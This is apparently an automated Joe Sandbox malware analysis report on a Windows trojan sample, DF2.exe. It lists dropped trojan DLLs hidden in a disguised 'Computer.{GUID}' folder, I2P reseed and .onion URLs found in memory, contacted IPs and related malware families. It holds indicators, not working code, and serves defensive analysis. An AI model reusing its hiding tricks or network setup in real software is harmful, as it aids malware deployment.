Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Services File Permissions Weakness	GUI Input Capture	1 System Network Configuration Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
DF2.exe	6%	Virustotal		Browse
DF2.exe	0%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe	100%	Avira	TR/AVI.Agent.jibab
C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe	100%	Joe Sandbox ML
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll	26%	ReversingLabs	Win64.Trojan.Generic
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll	8%	ReversingLabs	Win64.Trojan.Generic
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll	32%	ReversingLabs	Win64.Trojan.Generic
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll	3%	ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	70%	ReversingLabs	Win64.Trojan.Barys
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll	8%	ReversingLabs	Win64.Trojan.Generic
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll	3%	ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll	0%	ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll	3%	ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll	70%	ReversingLabs	Win64.Trojan.Generic
C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe	70%	ReversingLabs	Win64.Trojan.Barys
C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe	58%	ReversingLabs	Win64.Trojan.Alevaul
C:\Windows\Temp\2s3EMNnh	0%	ReversingLabs
C:\Windows\Temp\5P46VR1V	8%	ReversingLabs	Win64.Trojan.Generic
C:\Windows\Temp\6KasAPG0	26%	ReversingLabs	Win64.Trojan.Generic
C:\Windows\Temp\DiEI7oU1	70%	ReversingLabs	Win64.Trojan.Generic
C:\Windows\Temp\DkzUMxZ8	3%	ReversingLabs
C:\Windows\Temp\LcUJSdZq	8%	ReversingLabs	Win64.Trojan.Generic
C:\Windows\Temp\YERHbDgw	3%	ReversingLabs
C:\Windows\Temp\bT51Gn7Q	3%	ReversingLabs
C:\Windows\Temp\yGODxgsj	32%	ReversingLabs	Win64.Trojan.Generic

Source	Detection	Scanner	Label
https://reseed-fr.i2pd.xyz/	0%	Avira URL Cloud	safe
https://i2pseed.creativecowpat.net:8443/	0%	Avira URL Cloud	safe
http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3	0%	Avira URL Cloud	safe
https://reseed.i2p-projekt.de/	0%	Avira URL Cloud	safe
https://netdb.i2p2.no/	100%	Avira URL Cloud	malware
https://banana.incognet.io/;	0%	Avira URL Cloud	safe
https://reseed.stormycloud.org/s	0%	Avira URL Cloud	safe
https://i2p.novg.net/	0%	Avira URL Cloud	safe
https://www2.mk16.de/76	0%	Avira URL Cloud	safe
https://reseed.memcpy.io/	0%	Avira URL Cloud	safe
https://reseed2.i2p.net/r	100%	Avira URL Cloud	malware
https://i2p.ghativega.in/	0%	Avira URL Cloud	safe
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtn	0%	Avira URL Cloud	safe
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/	0%	Avira URL Cloud	safe
https://reseed.i2pgit.org/	100%	Avira URL Cloud	malware
https://reseed.i2pgit.org/9	100%	Avira URL Cloud	malware
https://www2.mk16.de/	0%	Avira URL Cloud	safe
http://reg.i2p/hosts.txt	0%	Avira URL Cloud	safe
https://i2pseed.creativecowpat.net:8443/i	0%	Avira URL Cloud	safe
https://reseed.stormycloud.org/I	0%	Avira URL Cloud	safe
https://reseed.stormycloud.org/E	0%	Avira URL Cloud	safe
http://reg.i2p/hosts.txtC	0%	Avira URL Cloud	safe
https://reseed-pl.i2pd.xyz/	0%	Avira URL Cloud	safe
http://127.0.0.1:8118	0%	Avira URL Cloud	safe
http://stats.i2p/cgi-bin/newhosts.txt	0%	Avira URL Cloud	safe
https://reseed.onion.im/6	0%	Avira URL Cloud	safe
https://reseed.diva.exchange/	100%	Avira URL Cloud	malware
http://identiguy.i2p/hosts.txt	0%	Avira URL Cloud	safe
https://reseed.stormycloud.org/T	0%	Avira URL Cloud	safe
https://www2.mk16.de/8	0%	Avira URL Cloud	safe
https://reseed.onion.im/	0%	Avira URL Cloud	safe
https://reseed.stormycloud.org/	0%	Avira URL Cloud	safe
https://i2pd.readthedocs.io/en/latest/user-guide/configuration/	0%	Avira URL Cloud	safe
https://legit-website.com/i2pseeds.su3	0%	Avira URL Cloud	safe
https://i2p.mooo.com/netDb/	0%	Avira URL Cloud	safe
https://reseed.memcpy.io/b.ci	0%	Avira URL Cloud	safe
https://reseed2.i2p.net/	100%	Avira URL Cloud	malware
https://reseed.i2pgit.org:443/i2pseeds.su3	100%	Avira URL Cloud	malware
https://reseed.i2pgit.org/i2pseeds.su3	100%	Avira URL Cloud	malware
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txttp://	0%	Avira URL Cloud	safe
https://banana.incognet.io/	0%	Avira URL Cloud	safe
https://i2p.ghativega.in/b.cW	0%	Avira URL Cloud	safe
http://rus.i2p/hosts.txt	0%	Avira URL Cloud	safe
https://reseed.stormycloud.org/b	0%	Avira URL Cloud	safe
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt	0%	Avira URL Cloud	safe
https://reseed-pl.i2pd.xyz/d	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
reseed.i2pgit.org	68.183.196.133	true	true		unknown
reseed.diva.exchange	80.74.145.70	true	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://reseed-fr.i2pd.xyz/	main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.dr	true	Avira URL Cloud: safe	unknown
https://i2pseed.creativecowpat.net:8443/	main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.dr	true	Avira URL Cloud: safe	unknown
https://reseed.stormycloud.org/s	main.exe, 00000015.00000002.2482716452.000001DE39D8D000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://banana.incognet.io/;	main.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www2.mk16.de/76	main.exe, 00000020.00000002.2911993076.00000200A04CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reseed.i2p-projekt.de/	nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr	false	Avira URL Cloud: safe	unknown
http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3	main.exe, 00000020.00000003.2599837625.00000200A08D0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000003.2599705548.00000200A08D0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000003.2599641838.00000200A08F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000003.2600230754.00000200A0506000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://i2p.novg.net/	main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.dr	true	Avira URL Cloud: safe	unknown
https://netdb.i2p2.no/	nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr	false	Avira URL Cloud: malware	unknown
https://reseed.memcpy.io/	main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.dr	true	Avira URL Cloud: safe	unknown
https://i2p.ghativega.in/	main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.dr	true	Avira URL Cloud: safe	unknown
https://reseed2.i2p.net/r	main.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.2482716452.000001DE39E17000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/	main.exe, 00000015.00000002.2482716452.000001DE39D8D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reseed.i2pgit.org/	main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.dr	true	Avira URL Cloud: malware	unknown
https://www2.mk16.de/	main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.dr	true	Avira URL Cloud: safe	unknown
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtn	main.exe, 00000015.00000002.2482716452.000001DE39D8D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reseed.i2pgit.org/9	main.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://reseed.stormycloud.org/I	main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://reg.i2p/hosts.txt	update.pkg.10.dr	false	Avira URL Cloud: safe	unknown
https://i2pseed.creativecowpat.net:8443/i	main.exe, 00000015.00000002.2482819721.000001DE3A1A0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reseed.stormycloud.org/E	main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://reseed-pl.i2pd.xyz/	main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.dr	true	Avira URL Cloud: safe	unknown
http://stats.i2p/cgi-bin/newhosts.txt	nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr	false	Avira URL Cloud: safe	unknown
http://reg.i2p/hosts.txtC	main.exe, 00000020.00000002.2911993076.00000200A04CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://127.0.0.1:8118	main.exe, 00000020.00000003.2586057584.00000200A04A8000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr	false	Avira URL Cloud: safe	unknown
http://identiguy.i2p/hosts.txt	nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr	false	Avira URL Cloud: safe	unknown
https://reseed.onion.im/6	main.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://reseed.diva.exchange/	main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.dr	true	Avira URL Cloud: malware	unknown
https://reseed.stormycloud.org/T	main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://www2.mk16.de/8	main.exe, 00000015.00000002.2482716452.000001DE39DB8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://legit-website.com/i2pseeds.su3	nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr	false	Avira URL Cloud: safe	unknown
https://reseed.onion.im/	main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.dr	true	Avira URL Cloud: safe	unknown
https://i2p.mooo.com/netDb/	nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr	false	Avira URL Cloud: safe	unknown
https://i2pd.readthedocs.io/en/latest/user-guide/configuration/	nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr	false	Avira URL Cloud: safe	unknown
https://reseed.memcpy.io/b.ci	main.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reseed.stormycloud.org/	main.exe, main.exe, 00000020.00000002.2913383515.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.dr	true	Avira URL Cloud: safe	unknown
https://reseed2.i2p.net/	main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.dr	true	Avira URL Cloud: malware	unknown
https://reseed.i2pgit.org/i2pseeds.su3	main.exe, 00000015.00000002.2482819721.000001DE3A1A0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://reseed.i2pgit.org:443/i2pseeds.su3	main.exe, 00000015.00000003.1876236118.000001DE39E3A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000003.1876537527.000001DE39E39000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txttp://	main.exe, 00000015.00000002.2482716452.000001DE39D8D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://banana.incognet.io/	main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.dr	true	Avira URL Cloud: safe	unknown
https://reseed-pl.i2pd.xyz/d	main.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://rus.i2p/hosts.txt	nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr	false	Avira URL Cloud: safe	unknown
https://i2p.ghativega.in/b.cW	main.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.2482716452.000001DE39E17000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reseed.stormycloud.org/b	main.exe, 00000015.00000002.2482716452.000001DE39D8D000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt	update.pkg.10.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
5.181.20.93	unknown	Russian Federation	3214	XTOMxTomEU	true
108.180.0.49	unknown	Canada	852	ASN852CA	false
87.180.222.251	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
67.223.218.98	unknown	United States	46632	SOUTHWEST-ARKANSAS-TELEPHONE-COOPERATIVEUS	false
125.212.237.207	unknown	Viet Nam	38731	VTDC-AS-VNVietel-CHTCompamyLtdVN	false
15.204.11.249	unknown	United States	71	HP-INTERNET-ASUS	false
95.164.4.146	unknown	Gibraltar	29632	NASSIST-ASGI	true
81.162.25.200	unknown	Russian Federation	47530	NVTC-ASRU	false
110.239.62.148	unknown	Australia	9723	ISEEK-AS-APiseekCommunicationsPtyLtdAU	false
23.137.250.43	unknown	Reserved	397614	GTLAKESUS	false
50.35.91.100	unknown	United States	27017	ZIPLY-FIBER-LEGACY-ASNUS	false
157.161.57.70	unknown	Switzerland	6772	IMPNET-ASCH	false
149.106.159.60	unknown	United States	19999	UNIONASNUS	false
88.228.207.122	unknown	Turkey	9121	TTNETTR	true
80.76.34.140	unknown	Germany	46475	LIMESTONENETWORKSUS	false
89.35.131.34	unknown	Romania	39668	INTERSAT-ASIonRatiunr33RO	true
81.168.83.201	unknown	United Kingdom	12513	ECLIPSEGB	true
185.82.217.48	unknown	Bulgaria	59729	ITL-BG	false
162.19.153.65	unknown	United States	209	CENTURYLINK-US-LEGACY-QWESTUS	false
116.202.17.147	unknown	Germany	24940	HETZNER-ASDE	false
107.161.80.18	unknown	United States	8100	ASN-QUADRANET-GLOBALUS	false
194.54.156.174	unknown	Ukraine	8654	CRIMEAINFOCOM-ASUA	false
37.120.171.64	unknown	Germany	197540	NETCUP-ASnetcupGmbHDE	false
38.40.94.251	unknown	United States	174	COGENT-174US	true
93.94.147.180	unknown	Russian Federation	44020	CLN-ASRU	false
78.46.239.124	unknown	Germany	24940	HETZNER-ASDE	false
45.200.148.158	unknown	Seychelles	328608	Africa-on-Cloud-ASZA	false
80.74.145.70	reseed.diva.exchange	Switzerland	21069	ASN-METANETRoutingpeeringissuesnocmetanetchCH	true
194.110.247.42	unknown	unknown	41108	FIRSTROOT-ASDE	false
188.120.244.218	unknown	Russian Federation	29182	THEFIRST-ASRU	false
78.58.99.133	unknown	Lithuania	8764	TELIA-LIETUVALT	true
72.68.225.51	unknown	United States	701	UUNETUS	false
85.24.237.45	unknown	Sweden	8473	BAHNHOFhttpwwwbahnhofnetSE	false
173.249.2.110	unknown	Germany	51167	CONTABODE	false
193.34.123.42	unknown	Germany	12732	GUTCON-NETCarrier51GmbHGutConGmbHDE	false
120.26.218.134	unknown	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
100.4.223.210	unknown	United States	701	UUNETUS	false
192.248.182.81	unknown	France	20473	AS-CHOOPAUS	false
66.176.202.101	unknown	United States	7922	COMCAST-7922US	false
95.188.183.13	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
173.68.123.78	unknown	United States	701	UUNETUS	true
73.247.24.93	unknown	United States	7922	COMCAST-7922US	false
85.242.211.221	unknown	Portugal	3243	MEO-RESIDENCIALPT	false
51.83.132.16	unknown	France	16276	OVHFR	false
123.57.221.156	unknown	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
68.183.196.133	reseed.i2pgit.org	United States	14061	DIGITALOCEAN-ASNUS	true
212.116.61.165	unknown	Finland	13170	KPO-ASFI	true
104.244.227.121	unknown	Jamaica	33576	DIG001JM	false
195.52.175.104	unknown	Germany	12312	ECOTELDE	false
118.211.240.78	unknown	Australia	4739	INTERNODE-ASInternodePtyLtdAU	false
59.110.52.4	unknown	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
89.66.70.5	unknown	Poland	6830	LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHolding	false
81.136.49.129	unknown	United Kingdom	2856	BT-UK-ASBTnetUKRegionalnetworkGB	true
46.0.4.103	unknown	Russian Federation	34533	ESAMARA-ASRU	false
190.62.46.158	unknown	El Salvador	14754	TelguaGT	false
68.149.143.121	unknown	Canada	6327	SHAWCA	true
82.64.105.181	unknown	France	12322	PROXADFR	false
173.59.19.119	unknown	United States	701	UUNETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583067
Start date and time:	2025-01-01 18:09:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	33
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DF2.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@45/74@2/59
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 104.208.16.94, 20.109.210.53, 13.107.246.45, 40.126.32.138
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
Execution Graph export aborted for target DF2.exe, PID 6652 because there are no executed function
Execution Graph export aborted for target nju2apmx83wqd9u7namsf59y.exe, PID 7028 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtCreateKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
12:09:58	API Interceptor	199x Sleep call for process: DF2.exe modified
12:09:59	API Interceptor	46x Sleep call for process: powershell.exe modified
12:10:49	API Interceptor	548x Sleep call for process: main.exe modified
12:11:17	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
23.137.250.43	ET5.exe	Get hash	malicious	Unknown	Browse
80.74.145.70	file.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reseed.diva.exchange	file.exe	Get hash	malicious	Unknown	Browse	80.74.145.70

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SOUTHWEST-ARKANSAS-TELEPHONE-COOPERATIVEUS	armv5l.elf	Get hash	malicious	Mirai	Browse	216.238.4.239
	SecuriteInfo.com.Linux.Siggen.9999.30976.5557.elf	Get hash	malicious	Mirai	Browse	216.238.3.63
	94.156.8.9-skid.ppc-2024-07-23T17_40_07.elf	Get hash	malicious	Mirai, Moobot	Browse	216.238.3.83
	skt.arm7.elf	Get hash	malicious	Mirai	Browse	216.238.3.95
	MG6OHOu9nZ.elf	Get hash	malicious	Unknown	Browse	216.238.4.210
	ji5zq1gsV7.elf	Get hash	malicious	Unknown	Browse	216.238.3.63
	rift.arm.elf	Get hash	malicious	Mirai	Browse	216.238.3.98
	skid.mpsl-20220826-1703	Get hash	malicious	Moobot	Browse	174.137.3.85
	rift.arm	Get hash	malicious	Unknown	Browse	216.238.4.222
	h4pztwgEUM	Get hash	malicious	Mirai	Browse	174.137.3.82
XTOMxTomEU	Palestinian_heritage_-_what_it_is_and_what_its_forms_are_docx.exe	Get hash	malicious	Unknown	Browse	5.181.23.41
	3sO4kwopMH.exe	Get hash	malicious	GuLoader FormBook	Browse	185.33.94.234
	Swift Copy.exe	Get hash	malicious	GuLoader FormBook	Browse	185.33.94.234
	jnnbbMX9Ch.exe	Get hash	malicious	GuLoader FormBook	Browse	185.33.94.22
	DUE PAYMENT.exe	Get hash	malicious	GuLoader FormBook	Browse	185.33.94.234
	Di5RbqBHf7.exe	Get hash	malicious	AsyncRAT	Browse	92.60.40.226
	Updated SOA.exe	Get hash	malicious	FormBook	Browse	185.33.94.22
	Revised_PO_758869.docx	Get hash	malicious	Unknown	Browse	185.255.55.12
	Revised_PO_758869.docx	Get hash	malicious	Unknown	Browse	185.255.55.12
DTAGInternetserviceprovideroperationsDE	loligang.sh4.elf	Get hash	malicious	Mirai	Browse	91.44.210.141
	loligang.arm7.elf	Get hash	malicious	Mirai	Browse	79.243.115.205
	loligang.ppc.elf	Get hash	malicious	Mirai	Browse	87.185.17.227
	cbr.x86.elf	Get hash	malicious	Mirai	Browse	31.251.56.43
	kwari.ppc.elf	Get hash	malicious	Unknown	Browse	80.139.201.94
	kwari.arm.elf	Get hash	malicious	Unknown	Browse	62.156.228.146
	kwari.mips.elf	Get hash	malicious	Unknown	Browse	93.242.36.29
	kwari.arm7.elf	Get hash	malicious	Mirai	Browse	79.208.241.239
	botx.mips.elf	Get hash	malicious	Mirai	Browse	37.88.63.120
	botx.arm7.elf	Get hash	malicious	Mirai	Browse	84.137.12.71
ASN852CA	loligang.arm7.elf	Get hash	malicious	Mirai	Browse	142.59.17.189
	botx.mips.elf	Get hash	malicious	Mirai	Browse	205.206.220.171
	x86_64.elf	Get hash	malicious	Mirai, Moobot	Browse	207.134.12.124
	db0fa4b8db0333367e9bda3ab68b8042.i686.elf	Get hash	malicious	Mirai, Gafgyt	Browse	161.188.161.86
	Flasher.exe	Get hash	malicious	Luca Stealer, Rusty Stealer	Browse	108.181.61.49
	msgde.exe	Get hash	malicious	Quasar	Browse	108.181.61.49
	6ee7HCp9cD.exe	Get hash	malicious	Quasar	Browse	108.181.61.49
	telnet.sh4.elf	Get hash	malicious	Unknown	Browse	75.155.196.115
	armv6l.elf	Get hash	malicious	Unknown	Browse	205.250.152.203
	wUSt04rfJ0.exe	Get hash	malicious	Quasar	Browse	108.181.61.49

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll	ET5.exe	Get hash	malicious	Unknown	Browse
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll	ET5.exe	Get hash	malicious	Unknown	Browse
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll	ET5.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_main.exe_59e5c191145a7e657df69e5cbadfff4911e783_61e28721_0a1493f8-80c0-4c5f-ae8c-b4c0afea8151\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9802357899525361
Encrypted:	false
SSDEEP:	192:0r1m6o/d0MALS36jN7EzuiF4iZ24lO8l:4mN/eMALXjNgzuiF4iY4lO8l
MD5:	DC957A6EB6CB842D6C832443FFFB8405
SHA1:	5967A3B9AF1FB4AF8067586F06BBA9400E12505F
SHA-256:	B77C2AF9CBB4E8D015B49B35992E77D9C4A43EC2D55145552492EFE96153D21B
